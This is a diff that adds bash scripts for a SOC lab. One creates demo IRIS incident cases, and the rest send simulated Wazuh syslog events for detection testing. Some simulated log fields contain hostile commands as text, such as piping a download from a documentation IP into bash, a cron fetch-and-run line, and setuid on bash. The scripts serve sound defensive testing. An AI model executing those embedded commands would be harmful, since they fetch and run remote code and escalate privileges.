+#!/usr/bin/env bash
2
+set -euo pipefail
3
+
4
+read_env_var() {
5
+  local key="$1"
6
+  local file="$2"
7
+  [[ -f "${file}" ]] || return 1
8
+  sed -n "s/^${key}=//p" "${file}" | head -n1
9
+}
10
+
11
+SOC_ENV_FILE="${SOC_ENV_FILE:-soc-integrator/.env}"
12
+ROOT_ENV_FILE="${ROOT_ENV_FILE:-.env}"
13
+
14
+iris_api_key_from_env="${IRIS_API_KEY:-}"
15
+if [[ -z "${iris_api_key_from_env}" ]]; then
16
+  iris_api_key_from_env="$(read_env_var "IRIS_API_KEY" "${SOC_ENV_FILE}" || true)"
17
+fi
18
+if [[ -z "${iris_api_key_from_env}" ]]; then
19
+  iris_api_key_from_env="$(read_env_var "IRIS_API_KEY" "${ROOT_ENV_FILE}" || true)"
20
+fi
21
+
22
+integrator_url_from_env="${INTEGRATOR_URL:-}"
23
+if [[ -z "${integrator_url_from_env}" ]]; then
24
+  integrator_url_from_env="$(read_env_var "INTEGRATOR_URL" "${SOC_ENV_FILE}" || true)"
25
+fi
26
+if [[ -z "${integrator_url_from_env}" ]]; then
27
+  integrator_url_from_env="http://localhost:8088"
28
+fi
29
+
30
+iris_base_url_from_env="${IRIS_BASE_URL:-}"
31
+if [[ -z "${iris_base_url_from_env}" ]]; then
32
+  iris_base_url_from_env="$(read_env_var "IRIS_BASE_URL" "${SOC_ENV_FILE}" || true)"
33
+fi
34
+if [[ -z "${iris_base_url_from_env}" ]]; then
35
+  iris_base_url_from_env="https://localhost:8443"
36
+fi
37
+
38
+MODE="${MODE:-integrator}"                  # integrator | direct
39
+COUNT="${COUNT:-5}"
40
+PREFIX="${PREFIX:-SOC Demo Incident}"
41
+INTEGRATOR_URL="${integrator_url_from_env}"
42
+IRIS_BASE_URL="${iris_base_url_from_env}"
43
+IRIS_API_KEY="${iris_api_key_from_env}"
44
+IRIS_VERIFY_SSL="${IRIS_VERIFY_SSL:-false}" # false -> use -k
45
+CASE_CUSTOMER="${CASE_CUSTOMER:-1}"
46
+CASE_SOC_ID="${CASE_SOC_ID:-}"
47
+
48
+if [[ ! "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
49
+  echo "error: COUNT must be a positive integer"
50
+  exit 1
51
+fi
52
+
53
+timestamp="$(date +%Y%m%d-%H%M%S)"
54
+
55
+for i in $(seq 1 "${COUNT}"); do
56
+  severity="medium"
57
+  if (( i % 4 == 0 )); then
58
+    severity="critical"
59
+  elif (( i % 3 == 0 )); then
60
+    severity="high"
61
+  elif (( i % 2 == 0 )); then
62
+    severity="low"
63
+  fi
64
+
65
+  title="${PREFIX} #${i} (${timestamp})"
66
+  description="Generated demo IRIS case ${i}/${COUNT} at ${timestamp}"
67
+
68
+  if [[ "${MODE}" == "integrator" ]]; then
69
+    response="$(
70
+      curl -sS -X POST "${INTEGRATOR_URL}/iris/tickets" \
71
+        -H "Content-Type: application/json" \
72
+        -d "{
73
+          \"title\": \"${title}\",
74
+          \"description\": \"${description}\",
75
+          \"case_customer\": ${CASE_CUSTOMER},
76
+          \"case_soc_id\": \"${CASE_SOC_ID}\",
77
+          \"payload\": {}
78
+        }"
79
+    )"
80
+  elif [[ "${MODE}" == "direct" ]]; then
81
+    curl_args=(-sS -X POST "${IRIS_BASE_URL}/api/v2/cases" -H "Content-Type: application/json")
82
+    if [[ "${IRIS_VERIFY_SSL}" == "false" ]]; then
83
+      curl_args+=(-k)
84
+    fi
85
+    if [[ -n "${IRIS_API_KEY}" ]]; then
86
+      curl_args+=(-H "Authorization: Bearer ${IRIS_API_KEY}")
87
+    fi
88
+    response="$(
89
+      curl "${curl_args[@]}" \
90
+        -d "{
91
+          \"case_name\": \"${title}\",
92
+          \"case_description\": \"${description}\",
93
+          \"case_customer\": ${CASE_CUSTOMER},
94
+          \"case_soc_id\": \"${CASE_SOC_ID}\"
95
+        }"
96
+    )"
97
+  else
98
+    echo "error: MODE must be 'integrator' or 'direct'"
99
+    exit 1
100
+  fi
101
+
102
+  RESPONSE="${response}" python3 - <<'PY'
103
+import json
104
+import os
105
+
106
+raw = os.environ.get("RESPONSE", "")
107
+try:
108
+    data = json.loads(raw)
109
+except Exception:
110
+    print(f"raw_response: {raw[:400]}")
111
+    raise SystemExit(0)
112
+
113
+# integrator shape: {"ok": true, "data": {"iris": {...}}}
114
+if isinstance(data, dict) and "data" in data and isinstance(data["data"], dict):
115
+    iris = data["data"].get("iris", {})
116
+    case = iris.get("data", {}) if isinstance(iris, dict) else {}
117
+    if case:
118
+        print(
119
+            f"created case_id={case.get('case_id')} case_uuid={case.get('case_uuid')} "
120
+            f"title={case.get('case_name')}"
121
+        )
122
+    else:
123
+        print(json.dumps(data))
124
+    raise SystemExit(0)
125
+
126
+# direct IRIS shape: {"status":"success","data":{...}}
127
+case = data.get("data", {}) if isinstance(data, dict) else {}
128
+if isinstance(case, dict) and case:
129
+    print(
130
+        f"created case_id={case.get('case_id')} case_uuid={case.get('case_uuid')} "
131
+        f"title={case.get('case_name')}"
132
+    )
133
+else:
134
+    print(json.dumps(data))
135
+PY
136
+done
137
+
138
+echo "done: created ${COUNT} demo cases (mode=${MODE})"

+ 33 - 5
scripts/send-wazuh-cisco-test-events.sh

@@ -4,6 +4,20 @@ set -euo pipefail
4 4
 SCENARIO="${1:-all}"
5 5
 COUNT="${2:-1}"
6 6
 DELAY="${3:-0.3}"
7
+FOREVER="false"
8
+
9
+for arg in "${@:4}"; do
10
+  case "${arg}" in
11
+    --forever)
12
+      FOREVER="true"
13
+      ;;
14
+    *)
15
+      echo "error: unexpected argument '${arg}'"
16
+      echo "usage: scripts/send-wazuh-cisco-test-events.sh [scenario] [count] [delay_seconds] [--forever]"
17
+      exit 1
18
+      ;;
19
+  esac
20
+done
7 21
 
8 22
 WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
9 23
 WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
@@ -19,6 +33,11 @@ if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
19 33
   exit 1
20 34
 fi
21 35
 
36
+if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
37
+  echo "error: delay must be numeric (example: 0.5)"
38
+  exit 1
39
+fi
40
+
22 41
 emit_syslog() {
23 42
   local msg="$1"
24 43
   local sent="false"
@@ -100,9 +119,18 @@ send_once() {
100 119
   esac
101 120
 }
102 121
 
103
-for ((i=1; i<=COUNT; i++)); do
104
-  send_once
105
-  if [[ "${i}" -lt "${COUNT}" ]]; then
122
+if [[ "${FOREVER}" == "true" ]]; then
123
+  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
124
+  trap 'echo; echo "stopped"; exit 0' INT TERM
125
+  while true; do
126
+    send_once
106 127
     sleep "${DELAY}"
107
-  fi
108
-done
128
+  done
129
+else
130
+  for ((i=1; i<=COUNT; i++)); do
131
+    send_once
132
+    if [[ "${i}" -lt "${COUNT}" ]]; then
133
+      sleep "${DELAY}"
134
+    fi
135
+  done
136
+fi

+ 228 - 0
scripts/send-wazuh-endpoint-agent-test-events.sh

@@ -0,0 +1,228 @@
1
+#!/usr/bin/env bash
2
+set -euo pipefail
3
+
4
+PLATFORM="${1:-all}"      # windows | mac | linux | all
5
+SCENARIO="${2:-all}"      # auth | process | persistence | privilege | malware | all
6
+COUNT="1"
7
+DELAY="0.3"
8
+FOREVER="false"
9
+DRY_RUN="${DRY_RUN:-0}"
10
+COUNT_SET="false"
11
+DELAY_SET="false"
12
+
13
+WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
14
+WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
15
+
16
+WIN_HOST="${WIN_HOST:-win-client-01}"
17
+MAC_HOST="${MAC_HOST:-mac-client-01}"
18
+LINUX_HOST="${LINUX_HOST:-linux-client-01}"
19
+SIM_USER="${SIM_USER:-jane.doe}"
20
+
21
+shift 2 || true
22
+
23
+while (($#)); do
24
+  case "$1" in
25
+    --forever)
26
+      FOREVER="true"
27
+      shift
28
+      ;;
29
+    *)
30
+      if [[ "${COUNT_SET}" == "false" ]]; then
31
+        COUNT="$1"
32
+        COUNT_SET="true"
33
+      elif [[ "${DELAY_SET}" == "false" ]]; then
34
+        DELAY="$1"
35
+        DELAY_SET="true"
36
+      else
37
+        echo "error: unexpected argument '$1'"
38
+        echo "usage: scripts/send-wazuh-endpoint-agent-test-events.sh [platform] [scenario] [count] [delay_seconds] [--forever]"
39
+        exit 1
40
+      fi
41
+      shift
42
+      ;;
43
+  esac
44
+done
45
+
46
+if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
47
+  echo "error: count must be a positive integer"
48
+  exit 1
49
+fi
50
+
51
+if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
52
+  echo "error: delay must be numeric (example: 0.5)"
53
+  exit 1
54
+fi
55
+
56
+emit_syslog() {
57
+  local msg="$1"
58
+  local sent="false"
59
+
60
+  if [[ "${DRY_RUN}" == "1" ]]; then
61
+    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${msg}"
62
+    return 0
63
+  fi
64
+
65
+  if command -v nc >/dev/null 2>&1; then
66
+    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
67
+      sent="true"
68
+    fi
69
+  fi
70
+
71
+  if [[ "${sent}" != "true" ]]; then
72
+    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
73
+      sent="true"
74
+    fi
75
+  fi
76
+
77
+  if [[ "${sent}" != "true" ]]; then
78
+    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
79
+    return 1
80
+  fi
81
+
82
+  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
83
+}
84
+
85
+rand_public_ip() {
86
+  if [[ $((RANDOM % 2)) -eq 0 ]]; then
87
+    echo "198.51.100.$((RANDOM % 240 + 10))"
88
+  else
89
+    echo "203.0.113.$((RANDOM % 240 + 10))"
90
+  fi
91
+}
92
+
93
+rand_private_ip() {
94
+  echo "10.$((RANDOM % 20 + 10)).$((RANDOM % 200 + 1)).$((RANDOM % 240 + 10))"
95
+}
96
+
97
+send_windows_auth() {
98
+  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_auth_fail severity=medium event_id=4625 account=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
99
+}
100
+
101
+send_windows_process() {
102
+  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_suspicious_process severity=high event_id=4688 process=\"powershell.exe\" cmdline=\"powershell -enc <base64>\" parent=\"winword.exe\" user=\"${SIM_USER}\""
103
+}
104
+
105
+send_windows_persistence() {
106
+  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_persistence_registry severity=high event_id=4657 registry_path=\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Updater\" user=\"${SIM_USER}\""
107
+}
108
+
109
+send_windows_privilege() {
110
+  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_privilege_group_add severity=high event_id=4732 account=\"${SIM_USER}\" target_group=\"Administrators\""
111
+}
112
+
113
+send_windows_malware() {
114
+  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_malware_detected severity=high event_id=1116 engine=\"Defender\" threat=\"Trojan:Win32/AgentTesla\" path=\"C:\\\\Users\\\\${SIM_USER}\\\\AppData\\\\Local\\\\Temp\\\\invoice.exe\" action=\"quarantine\""
115
+}
116
+
117
+send_mac_auth() {
118
+  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_auth_fail severity=medium subsystem=\"com.apple.loginwindow\" user=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
119
+}
120
+
121
+send_mac_process() {
122
+  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_suspicious_process severity=high process=\"osascript\" cmdline=\"osascript -e do shell script curl ...\" parent=\"Safari\" user=\"${SIM_USER}\""
123
+}
124
+
125
+send_mac_persistence() {
126
+  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_launchagent_created severity=high plist=\"/Users/${SIM_USER}/Library/LaunchAgents/com.apple.updater.plist\" user=\"${SIM_USER}\""
127
+}
128
+
129
+send_mac_privilege() {
130
+  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_privilege_escalation severity=high action=\"sudo\" user=\"${SIM_USER}\" tty=\"ttys001\" cmd=\"/bin/chmod +s /bin/bash\""
131
+}
132
+
133
+send_mac_malware() {
134
+  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_xprotect_detected severity=high signature=\"OSX.Adload\" file=\"/Users/${SIM_USER}/Downloads/installer.pkg\" action=\"blocked\""
135
+}
136
+
137
+send_linux_auth() {
138
+  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_ssh_auth_fail severity=medium process=\"sshd\" user=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
139
+}
140
+
141
+send_linux_process() {
142
+  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_suspicious_process severity=high process=\"curl\" cmdline=\"curl http://198.51.100.20/a.sh | bash\" user=\"${SIM_USER}\""
143
+}
144
+
145
+send_linux_persistence() {
146
+  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_cron_persistence severity=high file=\"/etc/cron.d/system-update\" user=\"root\" command=\"*/5 * * * * curl -fsSL http://203.0.113.20/s | sh\""
147
+}
148
+
149
+send_linux_privilege() {
150
+  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_sudo_privilege_escalation severity=high user=\"${SIM_USER}\" command=\"sudo usermod -aG sudo ${SIM_USER}\" src_ip=$(rand_private_ip)"
151
+}
152
+
153
+send_linux_malware() {
154
+  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_malware_detected severity=high scanner=\"clamav\" signature=\"Unix.Trojan.Mirai\" file=\"/tmp/kworkerd\" action=\"removed\""
155
+}
156
+
157
+send_one_platform() {
158
+  local p="$1"
159
+  case "${SCENARIO}" in
160
+    auth)
161
+      "send_${p}_auth"
162
+      ;;
163
+    process)
164
+      "send_${p}_process"
165
+      ;;
166
+    persistence)
167
+      "send_${p}_persistence"
168
+      ;;
169
+    privilege)
170
+      "send_${p}_privilege"
171
+      ;;
172
+    malware)
173
+      "send_${p}_malware"
174
+      ;;
175
+    all)
176
+      "send_${p}_auth"
177
+      "send_${p}_process"
178
+      "send_${p}_persistence"
179
+      "send_${p}_privilege"
180
+      "send_${p}_malware"
181
+      ;;
182
+    *)
183
+      echo "error: unknown scenario '${SCENARIO}'"
184
+      echo "valid: auth | process | persistence | privilege | malware | all"
185
+      exit 1
186
+      ;;
187
+  esac
188
+}
189
+
190
+send_once() {
191
+  case "${PLATFORM}" in
192
+    windows)
193
+      send_one_platform "windows"
194
+      ;;
195
+    mac|macos)
196
+      send_one_platform "mac"
197
+      ;;
198
+    linux)
199
+      send_one_platform "linux"
200
+      ;;
201
+    all)
202
+      send_one_platform "windows"
203
+      send_one_platform "mac"
204
+      send_one_platform "linux"
205
+      ;;
206
+    *)
207
+      echo "error: unknown platform '${PLATFORM}'"
208
+      echo "valid: windows | mac | linux | all"
209
+      exit 1
210
+      ;;
211
+  esac
212
+}
213
+
214
+if [[ "${FOREVER}" == "true" ]]; then
215
+  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
216
+  trap 'echo; echo "stopped"; exit 0' INT TERM
217
+  while true; do
218
+    send_once
219
+    sleep "${DELAY}"
220
+  done
221
+else
222
+  for ((i=1; i<=COUNT; i++)); do
223
+    send_once
224
+    if [[ "${i}" -lt "${COUNT}" ]]; then
225
+      sleep "${DELAY}"
226
+    fi
227
+  done
228
+fi

Разница между файлами не показана из-за своего большого размера
+ 217 - 0
scripts/send-wazuh-fortigate-continuous.sh


Разница между файлами не показана из-за своего большого размера
+ 135 - 0
scripts/send-wazuh-fortigate-test-events.sh


+ 329 - 0
scripts/send-wazuh-proposal-required-events.sh

@@ -0,0 +1,329 @@
1
+#!/usr/bin/env bash
2
+set -euo pipefail
3
+
4
+# Usage:
5
+#   scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds]
6
+#
7
+# selector:
8
+#   all | a1 | a2 | a3 | a4 | <usecase_id>
9
+#   example usecase_id: A2-01, A3-05, A4-24
10
+
11
+SELECTOR="${1:-all}"
12
+COUNT="${2:-1}"
13
+DELAY="${3:-0.3}"
14
+EVENT_DELAY="${EVENT_DELAY:-0.05}"
15
+DRY_RUN="${DRY_RUN:-0}"
16
+FOREVER="false"
17
+
18
+for arg in "${@:4}"; do
19
+  case "${arg}" in
20
+    --forever)
21
+      FOREVER="true"
22
+      ;;
23
+    *)
24
+      echo "error: unexpected argument '${arg}'"
25
+      echo "usage: scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds] [--forever]"
26
+      exit 1
27
+      ;;
28
+  esac
29
+done
30
+
31
+WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
32
+WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
33
+
34
+FGT_DEVNAME="${FGT_DEVNAME:-FGT80F-Branch01}"
35
+FGT_DEVID="${FGT_DEVID:-FGT80FTK20000001}"
36
+WIN_HOST="${WIN_HOST:-win-dc01}"
37
+DNS_HOST="${DNS_HOST:-dns-fw-01}"
38
+SIM_VPN_USER="${SIM_VPN_USER:-remote.user}"
39
+
40
+if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
41
+  echo "error: count must be a positive integer"
42
+  exit 1
43
+fi
44
+
45
+if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
46
+  echo "error: delay must be numeric"
47
+  exit 1
48
+fi
49
+
50
+if ! [[ "${EVENT_DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
51
+  echo "error: EVENT_DELAY must be numeric"
52
+  exit 1
53
+fi
54
+
55
+rand_public_ip() {
56
+  if [[ $((RANDOM % 2)) -eq 0 ]]; then
57
+    echo "198.51.100.$((RANDOM % 240 + 10))"
58
+  else
59
+    echo "203.0.113.$((RANDOM % 240 + 10))"
60
+  fi
61
+}
62
+
63
+rand_private_ip() {
64
+  echo "10.$((RANDOM % 20 + 10)).$((RANDOM % 200 + 1)).$((RANDOM % 240 + 10))"
65
+}
66
+
67
+rand_domain() {
68
+  echo "ioc-$((RANDOM % 9000 + 1000)).malicious.example"
69
+}
70
+
71
+emit_syslog() {
72
+  local msg="$1"
73
+  local sent="false"
74
+
75
+  if [[ "${DRY_RUN}" == "1" ]]; then
76
+    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${msg}"
77
+    return 0
78
+  fi
79
+
80
+  if command -v nc >/dev/null 2>&1; then
81
+    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
82
+      sent="true"
83
+    fi
84
+  fi
85
+
86
+  if [[ "${sent}" != "true" ]]; then
87
+    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
88
+      sent="true"
89
+    fi
90
+  fi
91
+
92
+  if [[ "${sent}" != "true" ]]; then
93
+    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
94
+    return 1
95
+  fi
96
+
97
+  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
98
+}
99
+
100
+selector_matches() {
101
+  local id="$1"
102
+  local section="$2"
103
+  local sel
104
+  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
105
+  local idl
106
+  idl="$(echo "${id}" | tr '[:upper:]' '[:lower:]')"
107
+  local sec
108
+  sec="$(echo "${section}" | tr '[:upper:]' '[:lower:]')"
109
+
110
+  [[ "${sel}" == "all" || "${sel}" == "${sec}" || "${sel}" == "${idl}" ]]
111
+}
112
+
113
+emit_fgt_usecase() {
114
+  local id="$1"
115
+  local section="$2"
116
+  local severity="$3"
117
+  local usecase="$4"
118
+  local body="$5"
119
+
120
+  selector_matches "${id}" "${section}" || return 0
121
+
122
+  emit_syslog "<190>date=$(date '+%Y-%m-%d') time=$(date '+%H:%M:%S') devname=\"${FGT_DEVNAME}\" devid=\"${FGT_DEVID}\" eventtime=$(date +%s) vd=\"root\" soc_mvp_test=true source=fortigate section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
123
+  sleep "${EVENT_DELAY}"
124
+}
125
+
126
+emit_dns_usecase() {
127
+  local id="$1"
128
+  local section="$2"
129
+  local severity="$3"
130
+  local usecase="$4"
131
+  local body="$5"
132
+
133
+  selector_matches "${id}" "${section}" || return 0
134
+
135
+  emit_syslog "<189>$(date '+%b %d %H:%M:%S') ${DNS_HOST} soc_mvp_test=true source=dns section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
136
+  sleep "${EVENT_DELAY}"
137
+}
138
+
139
+emit_windows_usecase() {
140
+  local id="$1"
141
+  local section="$2"
142
+  local severity="$3"
143
+  local usecase="$4"
144
+  local body="$5"
145
+
146
+  selector_matches "${id}" "${section}" || return 0
147
+
148
+  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
149
+  sleep "${EVENT_DELAY}"
150
+}
151
+
152
+emit_a1() {
153
+  local sip
154
+  local domain
155
+  local mip
156
+  sip="$(rand_private_ip)"
157
+  domain="$(rand_domain)"
158
+  mip="$(rand_public_ip)"
159
+
160
+  emit_dns_usecase "A1-01" "A1" "medium" \
161
+    "DNS Network Traffic Communicate to Malicious Domain" \
162
+    "event_type=ioc_dns_traffic src_ip=${sip} query=${domain} resolved_ip=${mip} action=blocked"
163
+
164
+  emit_dns_usecase "A1-02" "A1" "medium" \
165
+    "DNS Network Traffic Malicious Domain IOCs Detection" \
166
+    "event_type=ioc_domain_match src_ip=${sip} ioc_type=domain ioc_value=${domain} feed=threatintel_main confidence=high action=alert"
167
+}
168
+
169
+emit_a2() {
170
+  local pub
171
+  local sip
172
+  pub="$(rand_public_ip)"
173
+  sip="$(rand_private_ip)"
174
+
175
+  emit_fgt_usecase "A2-01" "A2" "high" "IPS IDS Network Traffic Allowed RDP from Public IPs" \
176
+    "logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" srcip=${pub} dstip=${sip} dstport=3389 service=\"RDP\" action=\"accept\" policyid=44"
177
+
178
+  emit_fgt_usecase "A2-02" "A2" "high" "IPS IDS Firewall Account Admin Password Change" \
179
+    "logid=\"0100044547\" type=\"event\" subtype=\"system\" user=\"admin\" action=\"password-change\" target_account=\"admin\""
180
+
181
+  emit_fgt_usecase "A2-03" "A2" "high" "IPS IDS Firewall Account Create Add Admin Account" \
182
+    "logid=\"0100044548\" type=\"event\" subtype=\"system\" user=\"admin\" action=\"create-admin\" target_account=\"secops_admin\""
183
+
184
+  emit_fgt_usecase "A2-04" "A2" "high" "IPS IDS Firewall Configure Disabled Email Notification" \
185
+    "logid=\"0100044551\" type=\"event\" subtype=\"system\" action=\"config-change\" config_item=\"alertemail\" config_value=\"disable\""
186
+
187
+  emit_fgt_usecase "A2-05" "A2" "low" "IPS IDS Firewall Configure Download Configure FW" \
188
+    "logid=\"0100044552\" type=\"event\" subtype=\"system\" action=\"download-config\" user=\"admin\""
189
+
190
+  emit_fgt_usecase "A2-06" "A2" "medium" "IPS IDS IDS Alert Multiple Critical High" \
191
+    "logid=\"0720018432\" type=\"utm\" subtype=\"ips\" action=\"detected\" attack=\"Multiple.Critical.High.Signatures\" severity=\"high\" count=7"
192
+
193
+  emit_fgt_usecase "A2-07" "A2" "low" "IPS IDS Network Traffic Port Scanning" \
194
+    "logid=\"0720018433\" type=\"utm\" subtype=\"anomaly\" attack=\"TCP.Port.Scan\" srcip=${pub} dstip=${sip} action=\"detected\""
195
+
196
+  emit_fgt_usecase "A2-08" "A2" "medium" "IPS IDS Network Traffic IOC Detection" \
197
+    "logid=\"0720018434\" type=\"utm\" subtype=\"ips\" ioc_type=ip ioc_value=$(rand_public_ip) action=\"blocked\""
198
+
199
+  emit_fgt_usecase "A2-09" "A2" "medium" "IPS IDS Network Traffic Port Scanning from Private IP" \
200
+    "logid=\"0720018435\" type=\"utm\" subtype=\"anomaly\" attack=\"Internal.Port.Scan\" srcip=$(rand_private_ip) dstip=$(rand_private_ip) action=\"detected\""
201
+
202
+  emit_fgt_usecase "A2-10" "A2" "medium" "IPS IDS Network Traffic Communicate to Malicious IP" \
203
+    "logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" srcip=$(rand_private_ip) dstip=$(rand_public_ip) threat_label=\"known-c2\" action=\"accept\""
204
+}
205
+
206
+emit_a3() {
207
+  local out_th
208
+  out_th="$(rand_public_ip)"
209
+
210
+  emit_fgt_usecase "A3-01" "A3" "high" "VPN Authentication Success from Guest Account" \
211
+    "logid=\"0101037131\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"guest\" srcip=${out_th} country=\"TH\""
212
+
213
+  emit_fgt_usecase "A3-02" "A3" "high" "VPN Authentication Success from Multiple Country" \
214
+    "logid=\"0101037132\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${out_th} country=\"US\" previous_country=\"TH\""
215
+
216
+  emit_fgt_usecase "A3-03" "A3" "high" "VPN Authentication Brute Force Success" \
217
+    "logid=\"0101037133\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${out_th} failed_attempts_before_success=18"
218
+
219
+  emit_fgt_usecase "A3-04" "A3" "low" "VPN Authentication Multiple Fail Many Accounts from One Source" \
220
+    "logid=\"0101037134\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-fail\" srcip=${out_th} failed_accounts=12"
221
+
222
+  emit_fgt_usecase "A3-05" "A3" "high" "VPN Authentication Success from Outside Thailand" \
223
+    "logid=\"0101037135\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${out_th} country=\"US\" expected_country=\"TH\""
224
+}
225
+
226
+emit_a4() {
227
+  emit_windows_usecase "A4-01" "A4" "medium" "Windows Authentication Multiple Fail from Privileged Account" \
228
+    "event_id=4625 account=\"administrator\" src_ip=$(rand_private_ip) fail_count=9"
229
+  emit_windows_usecase "A4-02" "A4" "medium" "Windows Authentication Multiple Fail from Service Account" \
230
+    "event_id=4625 account=\"svc_backup\" src_ip=$(rand_private_ip) fail_count=11"
231
+  emit_windows_usecase "A4-03" "A4" "medium" "Windows AD Enumeration with Malicious Tools" \
232
+    "event_id=4688 process=\"adfind.exe\" user=\"user1\" host=\"${WIN_HOST}\""
233
+  emit_windows_usecase "A4-04" "A4" "medium" "Windows Authentication Fail from Public IPs" \
234
+    "event_id=4625 account=\"user1\" src_ip=$(rand_public_ip) fail_count=4"
235
+  emit_windows_usecase "A4-05" "A4" "medium" "Windows File Share Enumeration to Single Destination" \
236
+    "event_id=5145 account=\"user1\" src_ip=$(rand_private_ip) share=\"\\\\\\\\fileserver\\\\finance\" object_count=87"
237
+  emit_windows_usecase "A4-06" "A4" "high" "Windows Authentication Success from Public IPs" \
238
+    "event_id=4624 account=\"user2\" src_ip=$(rand_public_ip) logon_type=10"
239
+  emit_windows_usecase "A4-07" "A4" "high" "Windows Authentication Privileged Account Impersonation" \
240
+    "event_id=4624 account=\"administrator\" impersonation=true source_account=\"user2\""
241
+  emit_windows_usecase "A4-08" "A4" "high" "Windows Authentication Successful Pass the Hash RDP" \
242
+    "event_id=4624 account=\"administrator\" logon_type=10 auth_package=\"NTLM\" pth_indicator=true"
243
+  emit_windows_usecase "A4-09" "A4" "high" "Windows Authentication Success from Guest Account" \
244
+    "event_id=4624 account=\"guest\" logon_type=3"
245
+  emit_windows_usecase "A4-10" "A4" "high" "Windows Authentication Interactive Logon Success by Service Account" \
246
